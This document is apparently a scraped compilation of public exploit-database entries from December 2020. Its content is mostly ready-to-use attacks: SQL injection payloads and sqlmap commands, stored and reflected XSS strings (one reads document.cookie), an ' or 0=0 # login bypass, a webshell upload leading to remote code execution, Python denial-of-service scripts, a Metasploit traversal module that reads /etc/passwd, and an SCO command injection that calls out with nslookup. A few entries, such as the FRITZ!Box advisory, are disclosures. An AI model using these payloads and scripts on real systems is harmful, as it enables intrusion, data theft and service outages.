ISHACK AI BOT

# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on Customer and select list. Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 5. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=edit_staff&id=1 AND 4164=4164 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV) Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- - ---

# Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Bookings" in header and select "Add Bookings". Step 3. Complete the required details and click on "Save" to save the new Bookings. Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon. Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite. Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 7. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=2' AND (SELECT 7113 FROM(SELECT COUNT(*),CONCAT(0x716a626a71,(SELECT (ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=2';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: id=-1072' UNION ALL SELECT NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL# ---

# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with any valid credentials Step 2. Click on the username in header and select "Manage Account". Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields. Step 4. Complete the other required details and click on save to update user information. Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered

# Exploit Title: Employee Record System 1.0 - Multiple Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-09 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the application with any valid user credentials. Step 2: Click on Add Employee. Step 3: input "<script>alert(1)</script>" in all fields except phone number fields. Note: increase the values of "1" in "alert(1)" to determine which field is vulnerable. Eg <script>alert(2)</script>, <script>alert(3)</script> ....etc. Step 4: Once all fields are completed, Click on ADD RECORD to save the record. Step 5: Click on All Employees page and this will trigger the Stored XSS. Step 6: To view all Stored XSS, after clicking on All Employees page, click on the View Employee Icon. This will tigger all Stored XSS payloads.

# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-10 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with any verified user credentials Step 2. Click on View Candidates page and select take exam. If there is no candidate, click on "Add New Candidate" page, fill details and add new candidate. Step 3. Click on "Take Exam" and capture the request in burpsuite. Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 5. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980 UNION SELECT 3372) END)) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW) ---

# Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-09 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the application with any valid user credentials. Step 2: Click on Add New Question Page. Step 3: input "<script>alert(document.cookie)</script>" in the new question field and select add new question. Step 4: Once you have an XSS payload as a question in add new question page, click on View Questions Page. Step 5: This will trigger the XSS payload.

# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc) # Date: 15/12/2020 # Exploit Author: Guillaume PETIT # Vendor Homepage: https://nxlog.co # Software Link: https://nxlog.co/products/nxlog-community-edition/download # Version: 2.10.2150 # Tested on: Linux Debian 10 && Windows Server 2019 # CVE: CVE-2020-35488 #!/usr/bin/python3 import sys import time import argparse from scapy.all import * def getPayload(args): # IF UNIX if (args.OS == 1): return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden" # IF WINDOWS elif (args.OS == 2): return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden" # Test elif (args.OS == 3): return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden" def runExploit(args,payload): priority = 30 message = payload syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message) send(syslog,verbose=args.DEBUG) def getArguments(): parser = argparse.ArgumentParser(description="Go h@ck SYSLOG") parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server") parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514") parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test") parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable") return parser.parse_args() def main(): args = getArguments() payload = getPayload(args) runExploit(args,payload) main()

# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting) # Date: 2020-12-14 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.phpjabbers.com # Software Link: https://www.phpjabbers.com/appointment-scheduler # Version: 2.3 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60) # CVE: CVE-2020-35416 Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML. Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others. PoC Request: GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1 Host: [removed] Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 X-Requested-With: XMLHttpRequest Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://[removed] Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422 PoC Response: HTTP/1.1 200 OK Server: nginx Date: Thu, 14 Dec 2020 10:48:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Origin, X-Requested-With Content-Length: 13988 <div class="container-fluid"> <div class="row"> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12"> <div class="panel panel-default pjAsContainer pjAsAside"> <div class="panel-heading p ...[SNIP]... <div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div> ...[SNIP]...

# Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated) # Date: 17.12.2020 # Exploit Author: Furkan Göksel # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Description: The Victor CMS v1.0 application is vulnerable to SQL # injection in c_id parameter of admin_edit_comment.php, p_id parameter # of admin_edit_post.php, u_id parameter of admin_edit_user.php, edit # parameter of admin_update_categories.php. # Tested on: Apache2/Linux Step 1: Register the system through main page and login your account Step 2: After successful login, select one of the specified tabs (post, categories, comments, users) Step 3: When you click edit button of these records, an HTTP request is sent to server to get details of this record with corresponding parameters (eg. for edit comment it is c_id parameter) Step 4: Inject your SQL payload to these ids or use sqlmap to dump Example PoC request is as follows: GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66 Upgrade-Insecure-Requests: 1 Same PoC payload is valid for all edit features of specified tabs.

# Exploit Title: Alumni Management System 1.0 - "Course Form" Stored XSS # Exploit Author: Aakash Madaan # Date: 2020-12-10 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on the "Course List" page. Step 3. In the "Course Form" field, use XSS payload "<script>alert("course")</script>" as the name of new course and click on save. Step 4. This should trigger the XSS payload and anytime you click on the "Course List" page, your stored XSS payload will be triggered.

# Exploit Title: Point of Sale System 1.0 - Authentication Bypass # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-17 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html # Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS # Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as Administrator. Step 1: On the login page, simply use { ' or 0=0 # } as username Step 2: On the login page, use same query{ ' or 0=0 # } as password All set you should be logged in as Administrator.

# Exploit Title: Alumni Management System 1.0 - Unrestricted File Upload To RCE # Exploit Author: Aakash Madaan # Date: 2020-12-17 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "System Settings" page. Step 3. At the image upload field, browse and select any php webshell. Click on upload to upload the php webshell. Step 4. Visit "http://localhost/admin/assets/uploads/" and select your upload phpwebshell. Step 5. You should have a remote code execution.

# Exploit Title: Smart Hospital 3.1 - "Add Patient" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-18 # Vendor Homepage: https://smart-hospital.in/index.html # Software Link: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038 # Affected Version: Version 3.1 # Tested on: Kali Linux Step 1. Login to the application with Super Admin credentials Step 2. Click on "OPD-Out Patient" and then click on "Add Patient" then select "Add Patient" Again. Step 3. Insert payload - "><svg/onmouseover=alert(1)> , in Name , Guardian Name , Email , Address , Remarks and Any Known Allergies and Save it. Step 4. Now the patient profile will open , when your course will move around profile details they will show an alert box.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress Duplicator File Read Vulnerability', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.}, 'References' => [ ['CVE', '2020-11738'], ['WPVDB', '10078'], ['URL', 'https://snapcreek.com/duplicator/docs/changelog'] ], 'Author' => [ 'Ramuel Gall', # Vulnerability discovery 'Hoa Nguyen - SunCSR Team' # Metasploit module ], 'DisclosureDate' => 'Feb 19 2020', 'License' => MSF_LICENSE )) register_options( [ OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5]) ]) end def check check_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24') end def run_host(ip) traversal = '../' * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'), 'vars_get' => { 'action' => 'duplicator_download', 'file' => "#{traversal}#{filename}" } }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_status('Downloading file...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'duplicator.traversal', 'text/plain', ip, res.body, fname ) print_good("File saved in: #{path}") end end

# Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection # Exploit Author: Aakash Madaan # Date: 2020-12-17 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Events" page. Step 3. Choose any event and select "view" or "edit". The url should be " http://localhost/index.php?page=view_event&id=2" or " http://localhost/admin/index.php?page=manage_event&id=1" Step 4. Capture the request to the "view" or "edit" event page in burpsuite. Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3 ELSE (SELECT 5620 UNION SELECT 3605) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=edit_student&id=3 AND (SELECT 7847 FROM (SELECT(SLEEP(5)))LQiE) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: page=edit_student&id=-4840 UNION ALL SELECT NULL,CONCAT(0x717a7a7171,0x7152494c444964626e63466c66734573495771697a566862414e6c6f786e6d54566c6549484f6967,0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- Step 6. Sqlmap should inject the web-app successfully which leads to information disclosure

# Exploit Title: FRITZ!Box 7.20 - DNS Rebinding Protection Bypass # Date: 2020-06-23 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://en.avm.de/ # Version: 7.20 # CVE: 2020-26887 Advisory: FRITZ!Box DNS Rebinding Protection Bypass RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows to resolve DNS answers that point to IP addresses in the private local network, despite the DNS rebinding protection mechanism. Details ======= Product: FRITZ!Box 7490 and potentially others Affected Versions: 7.20 and below Fixed Versions: >= 7.21 Vulnerability Type: Bypass Security Risk: low Vendor URL: https://en.avm.de/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003 Advisory Status: published CVE: 2020-26887 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887 Introduction ============ "For security reasons, the FRITZ!Box suppresses DNS responses that refer to IP addresses in its own home network. This is a security function of the FRITZ!Box to protect against what are known as DNS rebinding attacks." (from the vendor's homepage) More Details ============ FRITZ!Box router devices employ a protection mechanism against DNS rebinding attacks. If a DNS answer points to an IP address in the private network range of the router, the answer is suppressed. Suppose the FRITZ!Box routers DHCP server is in its default configuration and serves the private IP range of 192.168.178.1/24. If a DNS request is made by a connected device, which resolves to an IPv4 address in the configured private IP range (for example 192.168.178.20) an empty answer is returned. However, if instead the DNS answer contains an AAAA-record with the same private IP address in its IPv6 representation (::ffff:192.168.178.20) it is returned successfully. Furthermore, DNS requests which resolve to the loopback address 127.0.0.1 or the special address 0.0.0.0 can be retrieved, too. Proof of Concept ================ Supposing the following resource records (RR) are configured for different subdomains of example.com: ------------------------------------------------------------------------ private.example.com 1 IN A 192.168.178.20 local.example.com 1 IN A 127.0.0.1 privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 ------------------------------------------------------------------------ A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected: ------------------------------------------------------------------------ $ dig private.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;private.example.com. IN A ------------------------------------------------------------------------ DNS requests for the subdomains privateipv6.example.com and local.example.com return the configured resource records successfully, effectively bypassing the DNS rebinding protection: ------------------------------------------------------------------------ $ dig privateipv6.example.com @192.168.178.1 AAAA ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;privateipv6.example.com. IN AAAA ;; ANSWER SECTION: privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 $ dig local.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;local.example.com. IN A ;; ANSWER SECTION: local.example.com. 1 IN A 127.0.0.1 ------------------------------------------------------------------------ Workaround ========== None. Fix === The problem is corrected in FRITZ!OS 7.21. Security Risk ============= As shown, the DNS rebinding protection of FRITZ!Box routers can be bypassed allowing for DNS rebinding attacks against connected devices. This type of attack however is only possible if vulnerable services are present in the local network, which are reachable over HTTP without authentication. The web interface of FRITZ!Box routers for example is not vulnerable to this type of attack, since the HTTP Host header is checked for known domains. For this reason the risk is estimated to be low. Timeline ======== 2020-06-23 Vulnerability identified 2020-07-08 Vendor notified 2020-07-20 Vendor provided fixed version to RedTeam Pentesting 2020-07-23 Vendor notified of another problematic IP 2020-08-06 Vendor provided fixed version to RedTeam Pentesting 2020-10-06 Vendor starts distribution of fixed version for selected devices 2020-10-19 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

# Exploit Title: Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-18 # Vendor Homepage: https://xeroneit.net/ # Software Link: https://xeroneit.net/portfolio/library-management-system-lms # Affected Version: Version 3.1 # Tested on: Kali Linux Step 1. Login to the application as Admin. Step 2. Select "Book" from menu and click on "Book Category" . Now , click on "Add" Button. Step 3. Insert payload - "><img src onerror=alert(1)> , in "Category Name" and Save it. Step 4. Now you will see an alert box .

# Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service (Poc) # Data: 18-Dec-2020 # Exploit Author: Ahmed Elkhressy # Vendor Homepage: http://www.syncbreeze.com # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe # Version: 10.0.28 # Tested on: Windows 7, Windows 10 #!/usr/bin/python import socket host="192.168.1.9" payload = 'A' *1000 request = "" request += "POST /login HTTP/1.1\r\n" request += "Host: "+host+"\r\n" request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n" request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" request += "Accept-Language: en-US,en;q=0.5\r\n" request += "Accept-Encoding: gzip, deflate\r\n" request += "Content-Type: application/x-www-form-urlencoded\r\n" request += "Content-Length: 27\r\n" request += "Origin: http://"+host+"\r\n" request += "Connection: keep-alive\r\n" request += "Referer: http://"+host+"/login"+payload+"\r\n" request += "Upgrade-Insecure-Requests: 1\r\n" request += "\r\n" request += "username=test&password=test" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 80)) s.send(request) print s.recv(1024) s.close

# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection # Google Dork: N/A # Date: 20 December 2020 # Exploit Author: BouSalman # Vendor Homepage: https://github.com/spotweb/spotweb # Software Link: N/A # Version: 1.4.9 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-35545 GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1 Host: 192.168.99.151 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close

# Exploit Title: Academy-LMS 4.3 - Stored XSS # Date: 19/12/2020 # Vendor page: https://academy-lms.com/ # Version: 4.3 # Tested on Win10 and Google Chrome # Exploit Author: Vinicius Alves # XSS Payload: </script><svg onload=alert();> 1) Access LMS and log in to admin panel 2) Access courses page 3) Open course manager and SEO menu 4) Paste the XSS Payload tag and Submit 5) Access the course page on frontend 6) Trigged!

# Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-21 # Google Dork: N/A # Vendor Homepage: http://codekernel.net/ # Software Link: https://codecanyon.net/item/queue-management-system/22029961 # Affected Version: Version 4.0.0 # Patched Version: Unpatched # Category: Web Application # Tested on: Kali Linux Step 1. Login as admin. Step 2. Select "Users" from menu and click on "Add User . Step 3. Insert payload - "><svg/onload=alert(1)> in "Firtst Name" , " Last Name "and " Email ". Step 4. Now open "User List " from menu and you will get alert box.

# Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection # Google Dork: inurl:/cgi-bin/manlist?section # Discovered Date: 04/09/2020 # Author: Ramikan # Vendor Homepage: https://www.xinuos.com/products/ # Software Link: https://www.sco.com/products/openserver507/-overview # Affected Version: Tested on 5.0.7, 6 can be affected on other versions. # Tested on: SCO Openserver 5.0.7 & version 6 # CVE : CVE-2020-25494 ************************************************************************************************************************************* Vulnerability :OS Command Injection ************************************************************************************************************************************* The outputform, toclevels parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed. The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name. Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request. Affected URL:http://host:8457/cgi-bin/printbook Affected Paramenter: outputform, toclevels ************************************************************************************************************************************* POC ************************************************************************************************************************************* Request: ************************************************************************************************************************************* POST /cgi-bin/printbook HTTP/1.1 Host: 10.0.0.45:8457 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.45:8457/en/Navpages/printmap.html Content-Type: application/x-www-form-urlencoded Content-Length: 118 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS. ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.1 200 OK Date: Tue, 04 Sep 2020 11:17:52 GMT Server: Apache/1.3.33 (Unix) mod_perl/1.29 Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 3188

